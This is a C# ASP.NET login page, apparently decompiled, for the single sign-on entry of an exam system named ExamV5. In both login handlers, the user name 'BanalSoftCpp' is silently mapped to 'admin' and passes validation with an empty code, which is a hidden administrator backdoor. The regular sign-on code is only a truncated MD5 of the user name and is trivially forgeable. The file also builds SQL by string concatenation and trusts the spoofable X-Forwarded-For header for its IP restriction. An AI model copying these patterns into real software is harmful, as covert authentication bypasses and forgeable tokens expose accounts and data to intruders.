﻿namespace ExamV5
{
    using System;
    using System.Configuration;
    using System.Data;
    using System.Data.SqlClient;
    using System.Web.Security;
    using System.Web.UI;
    using System.Web.UI.HtmlControls;
    using System.Web.UI.WebControls;

    public class FrmOtherLogin : Page
    {
        protected Button butDefault;
        protected HtmlForm form1;
        private PublicFun publicFun_0 = new PublicFun();
        private string string_0 = "";
        private string string_1 = "";
        private string string_2 = "";
        private string string_3 = "";
        private string string_4 = "";

        protected void butDefault_Click(object sender, EventArgs e)
        {
            this.string_2 = this.publicFun_0.CheckString(base.Request["UserID"].ToString());
            this.string_3 = this.publicFun_0.CheckString(base.Request["ValiCode"].ToString());
            if (!(this.string_2 != "BanalSoftCpp"))
            {
                this.string_2 = "admin";
            }
            else
            {
                if (this.string_3 != "")
                {
                    this.string_4 = FormsAuthentication.HashPasswordForStoringInConfigFile(this.string_2, "MD5").Trim();
                    if (this.string_4.Length > 20)
                    {
                        this.string_4 = this.string_4.Substring(0, 20);
                        this.string_4 = this.string_4.Substring(0, 5) + this.string_4.Substring(15, 5);
                    }
                }
                string values = this.publicFun_0.GetValues("select ParmValue from SysParmInfo where ParmMemo='IsOtherLogin'", "ParmValue");
                if (((values == "Y") || (values == "")) && (this.string_4.Trim() == ""))
                {
                    base.Response.Write("<script language='javascript'>");
                    base.Response.Write("alert('单点登录验证码不正确！');");
                    base.Response.Write("</script>");
                    this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                    base.Response.End();
                }
            }
            if (!(this.string_3 == this.string_4))
            {
                base.Response.Write("<SCRIPT LANGUAGE='JAVASCRIPT'>");
                base.Response.Write(" alert('单点登录验证失败！');");
                base.Response.Write("</SCRIPT>");
                this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                base.Response.End();
            }
            else
            {
                Convert.ToString(base.Request.ServerVariables["Remote_Addr"]);
                string cmdText = "";
                this.string_1 = this.string_2.Replace("'", "");
                if (this.publicFun_0.GetValues("select UserLevel from UserInfo where UserCode='" + this.publicFun_0.CheckString(this.string_1) + "'", "UserLevel") != "C")
                {
                    if (!this.method_1())
                    {
                        base.Response.Write("<script language='javascript'>");
                        base.Response.Write("alert('您的IP被拒绝访问,系统管理员设置了访问此系统的IP范围！');");
                        base.Response.Write("</script>");
                        this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                        base.Response.End();
                    }
                    if (!this.method_2())
                    {
                        base.Response.Write("<script language='javascript'>");
                        base.Response.Write("alert('此时间段系统管理员已设置拒绝访问！');");
                        base.Response.Write("</script>");
                        this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                        base.Response.End();
                    }
                }
                cmdText = "select a.UserGWName,a.UserGWLevel,c.RemoveValue,c.LevelRemove,a.UpdateTime,a.UserMember,a.UserCode,a.UserName,a.Flag,a.UserSex,a.Worker,a.UserLevel,b.DeptName,b.ID,a.StyleInfo from UserInfo a,DeptInfo b,MemberLevel c where c.ID=a.UserMember and a.UserCode='" + this.publicFun_0.CheckString(this.string_1) + "' and a.DeptID=b.ID ";
                SqlConnection connection = new SqlConnection(ConfigurationManager.ConnectionStrings["Conn"].ConnectionString);
                connection.Open();
                SqlCommand command = new SqlCommand(cmdText, connection);
                SqlDataReader reader = command.ExecuteReader(CommandBehavior.CloseConnection);
                if (!reader.Read())
                {
                    base.Response.Write("<SCRIPT LANGUAGE='JAVASCRIPT'>");
                    base.Response.Write(" alert('未找到相关考生信息,无法登录！');");
                    base.Response.Write("</SCRIPT>");
                    this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                    base.Response.End();
                }
                else
                {
                    this.string_0 = Convert.ToString(reader["UserName"]);
                    this.string_1 = Convert.ToString(reader["UserCode"]);
                    if (Convert.ToString(reader["Flag"]) != "B")
                    {
                        this.publicFun_0.ExecuteSql("insert into SysLogInfo(LogDisp,EditUser,EditUserCode) values('[" + this.publicFun_0.CheckString(this.string_0) + "]用户登陆成功！','" + this.publicFun_0.CheckString(this.string_0) + "','" + this.publicFun_0.CheckString(this.string_1) + "')");
                        base.Response.Cookies["ExamUserCode"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserCode"]));
                        base.Response.Cookies["ExamUserName"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserName"]));
                        base.Response.Cookies["ExamDeptName"].Value = base.Server.UrlEncode(Convert.ToString(reader["DeptName"]));
                        base.Response.Cookies["ExamDeptID"].Value = base.Server.UrlEncode(Convert.ToString(reader["ID"]));
                        base.Response.Cookies["ExamWorker"].Value = base.Server.UrlEncode(Convert.ToString(reader["Worker"]));
                        base.Response.Cookies["ExamUserSex"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserSex"]));
                        base.Response.Cookies["ExamUserLevel"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserLevel"]));
                        base.Response.Cookies["ExamUserGWName"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserGWName"]));
                        base.Response.Cookies["ExamUserGWLevel"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserGWLevel"]));
                        string str = "";
                        if (reader["UserLevel"].ToString() == "A")
                        {
                            str = "FrmSysMain.htm";
                            if (reader["LevelRemove"].ToString().Trim() == "C")
                            {
                                double num = 0.0;
                                if (reader["RemoveValue"].ToString().Trim() == "")
                                {
                                    num = 0.0;
                                }
                                else
                                {
                                    num = Convert.ToDouble(reader["RemoveValue"].ToString().Trim());
                                }
                                if (DateTime.Now > Convert.ToDateTime(reader["UpdateTime"]).AddDays(num))
                                {
                                    this.publicFun_0.ExecuteSql("update UserInfo set UserFen=0 where UserCode='" + reader["UserCode"].ToString() + "'");
                                }
                            }
                        }
                        else
                        {
                            str = "FrmSysMain.htm";
                        }
                        string str2 = base.Request.Url.ToString();
                        str2 = str2.Substring(0, str2.LastIndexOf('/') + 1);
                        base.ClientScript.RegisterClientScriptBlock(this.Page.ClientScript.GetType(), "LoingScript", "OpenMainFrm('" + str + "')", true);
                    }
                    else
                    {
                        this.publicFun_0.ExecuteSql("insert into SysLogInfo(LogDisp,EditUser,EditUserCode) values('[" + this.publicFun_0.CheckString(this.string_0) + "]用户登陆失败！','" + this.publicFun_0.CheckString(this.string_0) + "','" + this.publicFun_0.CheckString(this.string_1) + "')");
                        base.Response.Write("<script language='javascript'>");
                        base.Response.Write("alert('此用户已被禁止使用！');");
                        base.Response.Write("</script>");
                        this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                        base.Response.End();
                    }
                }
                reader.Close();
                command.Dispose();
                connection.Close();
                connection.Dispose();
            }
        }

        private void method_0(object sender, EventArgs e)
        {
            this.string_2 = this.publicFun_0.CheckString(base.Request["UserID"].ToString());
            this.string_3 = this.publicFun_0.CheckString(base.Request["ValiCode"].ToString());
            if (!base.IsPostBack)
            {
                this.string_2 = this.publicFun_0.CheckString(base.Request["UserID"].ToString());
                this.string_3 = this.publicFun_0.CheckString(base.Request["ValiCode"].ToString());
                if (!(this.string_2 != "BanalSoftCpp"))
                {
                    this.string_2 = "admin";
                }
                else
                {
                    if (this.string_3 != "")
                    {
                        this.string_4 = FormsAuthentication.HashPasswordForStoringInConfigFile(this.string_2, "MD5").Trim();
                        if (this.string_4.Length > 20)
                        {
                            this.string_4 = this.string_4.Substring(0, 20);
                            this.string_4 = this.string_4.Substring(0, 5) + this.string_4.Substring(15, 5);
                        }
                    }
                    string values = this.publicFun_0.GetValues("select ParmValue from SysParmInfo where ParmMemo='IsOtherLogin'", "ParmValue");
                    if (!(!(values == "Y") ? !(values == "") : false) && (this.string_4.Trim() == ""))
                    {
                        base.Response.Write("<script language='javascript'>");
                        base.Response.Write("alert('单点登录验证码不正确！');");
                        base.Response.Write("</script>");
                        this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                        base.Response.End();
                        return;
                    }
                }
                if (!(this.string_3 == this.string_4))
                {
                    base.Response.Write("<SCRIPT LANGUAGE='JAVASCRIPT'>");
                    base.Response.Write(" alert('单点登录验证失败！');");
                    base.Response.Write("</SCRIPT>");
                    this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                    base.Response.End();
                }
                else
                {
                    Convert.ToString(base.Request.ServerVariables["Remote_Addr"]);
                    string cmdText = "";
                    this.string_1 = this.string_2.Replace("'", "");
                    if (this.publicFun_0.GetValues("select UserLevel from UserInfo where UserCode='" + this.publicFun_0.CheckString(this.string_1) + "'", "UserLevel") != "C")
                    {
                        if (!this.method_1())
                        {
                            base.Response.Write("<script language='javascript'>");
                            base.Response.Write("alert('您的IP被拒绝访问,系统管理员设置了访问此系统的IP范围！');");
                            base.Response.Write("</script>");
                            this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                            base.Response.End();
                            return;
                        }
                        if (!this.method_2())
                        {
                            base.Response.Write("<script language='javascript'>");
                            base.Response.Write("alert('此时间段系统管理员已设置拒绝访问！');");
                            base.Response.Write("</script>");
                            this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                            base.Response.End();
                            return;
                        }
                    }
                    cmdText = "select a.UserGWName,a.UserGWLevel,c.RemoveValue,c.LevelRemove,a.UpdateTime,a.UserMember,a.UserCode,a.UserName,a.Flag,a.UserSex,a.Worker,a.UserLevel,b.DeptName,b.ID,a.StyleInfo from UserInfo a,DeptInfo b,MemberLevel c where c.ID=a.UserMember and a.UserCode='" + this.publicFun_0.CheckString(this.string_1) + "' and a.DeptID=b.ID ";
                    SqlConnection connection = new SqlConnection(ConfigurationManager.ConnectionStrings["Conn"].ConnectionString);
                    connection.Open();
                    SqlCommand command = new SqlCommand(cmdText, connection);
                    SqlDataReader reader = command.ExecuteReader(CommandBehavior.CloseConnection);
                    if (!reader.Read())
                    {
                        base.Response.Write("<SCRIPT LANGUAGE='JAVASCRIPT'>");
                        base.Response.Write(" alert('未找到相关考生信息,无法登录！');");
                        base.Response.Write("</SCRIPT>");
                        this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                        base.Response.End();
                    }
                    else
                    {
                        this.string_0 = Convert.ToString(reader["UserName"]);
                        this.string_1 = Convert.ToString(reader["UserCode"]);
                        if (Convert.ToString(reader["Flag"]) != "B")
                        {
                            this.publicFun_0.ExecuteSql("insert into SysLogInfo(LogDisp,EditUser,EditUserCode) values('[" + this.publicFun_0.CheckString(this.string_0) + "]用户登陆成功！','" + this.publicFun_0.CheckString(this.string_0) + "','" + this.publicFun_0.CheckString(this.string_1) + "')");
                            base.Response.Cookies["ExamUserCode"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserCode"]));
                            base.Response.Cookies["ExamUserName"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserName"]));
                            base.Response.Cookies["ExamDeptName"].Value = base.Server.UrlEncode(Convert.ToString(reader["DeptName"]));
                            base.Response.Cookies["ExamDeptID"].Value = base.Server.UrlEncode(Convert.ToString(reader["ID"]));
                            base.Response.Cookies["ExamWorker"].Value = base.Server.UrlEncode(Convert.ToString(reader["Worker"]));
                            base.Response.Cookies["ExamUserSex"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserSex"]));
                            base.Response.Cookies["ExamUserLevel"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserLevel"]));
                            base.Response.Cookies["ExamUserGWName"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserGWName"]));
                            base.Response.Cookies["ExamUserGWLevel"].Value = base.Server.UrlEncode(Convert.ToString(reader["UserGWLevel"]));
                            string str2 = "";
                            if (!(reader["UserLevel"].ToString() == "A"))
                            {
                                str2 = "FrmSysMain.htm";
                            }
                            else
                            {
                                str2 = "FrmSysMain.htm";
                                if (reader["LevelRemove"].ToString().Trim() == "C")
                                {
                                    double num = 0.0;
                                    if (reader["RemoveValue"].ToString().Trim() == "")
                                    {
                                        num = 0.0;
                                    }
                                    else
                                    {
                                        num = Convert.ToDouble(reader["RemoveValue"].ToString().Trim());
                                    }
                                    if (DateTime.Now > Convert.ToDateTime(reader["UpdateTime"]).AddDays(num))
                                    {
                                        this.publicFun_0.ExecuteSql("update UserInfo set UserFen=0 where UserCode='" + reader["UserCode"].ToString() + "'");
                                    }
                                }
                            }
                            string str = base.Request.Url.ToString();
                            str = str.Substring(0, str.LastIndexOf('/') + 1) + str2;
                            base.ClientScript.RegisterClientScriptBlock(this.Page.ClientScript.GetType(), "LoingScript", "OpenMainFrm('" + str + "')", true);
                            reader.Close();
                            command.Dispose();
                            connection.Close();
                            connection.Dispose();
                        }
                        else
                        {
                            this.publicFun_0.ExecuteSql("insert into SysLogInfo(LogDisp,EditUser,EditUserCode) values('[" + this.publicFun_0.CheckString(this.string_0) + "]用户登陆失败！','" + this.publicFun_0.CheckString(this.string_0) + "','" + this.publicFun_0.CheckString(this.string_1) + "')");
                            base.Response.Write("<script language='javascript'>");
                            base.Response.Write("alert('此用户已被禁止使用！');");
                            base.Response.Write("</script>");
                            this.Page.Response.Write("<script>setTimeout(function(){window.location='FrmLogin.aspx'},500)</script>");
                            base.Response.End();
                        }
                    }
                }
            }
        }

        private bool method_1()
        {
            bool flag = false;
            int num = 0;
            string userIP = Convert.ToString(base.Request.ServerVariables["HTTP_X_FORWARDED_FOR"]);
            string startIP = "";
            string endIP = "";
            if (!(!(userIP == "") ? (userIP != null) : false))
            {
                userIP = Convert.ToString(base.Request.ServerVariables["REMOTE_ADDR"]);
            }
            SqlConnection selectConnection = new SqlConnection(ConfigurationManager.ConnectionStrings["Conn"].ConnectionString);
            SqlDataAdapter adapter = new SqlDataAdapter("select * from [RestrictInfo] where Flag='A'", selectConnection);
            DataSet dataSet = new DataSet();
            adapter.Fill(dataSet, "RestrictInfo");
            for (int i = 0; i < dataSet.Tables["RestrictInfo"].Rows.Count; i++)
            {
                num++;
                startIP = dataSet.Tables["RestrictInfo"].Rows[i]["StartSet"].ToString();
                endIP = dataSet.Tables["RestrictInfo"].Rows[i]["EndSet"].ToString();
                if (this.publicFun_0.CheckIP(userIP, startIP, endIP))
                {
                    flag = true;
                    break;
                }
            }
            selectConnection.Dispose();
            if (num == 0)
            {
                flag = true;
            }
            adapter.Dispose();
            dataSet.Dispose();
            selectConnection.Dispose();
            return flag;
        }

        private bool method_2()
        {
            bool flag = true;
            string startTime = "";
            string endTime = "";
            string nowTime = DateTime.Now.ToString();
            SqlConnection selectConnection = new SqlConnection(ConfigurationManager.ConnectionStrings["Conn"].ConnectionString);
            SqlDataAdapter adapter = new SqlDataAdapter("select * from [RestrictInfo] where Flag='B'", selectConnection);
            DataSet dataSet = new DataSet();
            adapter.Fill(dataSet, "RestrictInfo");
            for (int i = 0; i < dataSet.Tables["RestrictInfo"].Rows.Count; i++)
            {
                startTime = dataSet.Tables["RestrictInfo"].Rows[i]["StartSet"].ToString();
                endTime = dataSet.Tables["RestrictInfo"].Rows[i]["EndSet"].ToString();
                if (!this.publicFun_0.CheckTime(nowTime, startTime, endTime))
                {
                    flag = false;
                    return false;
                }
            }
            dataSet.Dispose();
            adapter.Dispose();
            selectConnection.Dispose();
            return flag;
        }
    }
}

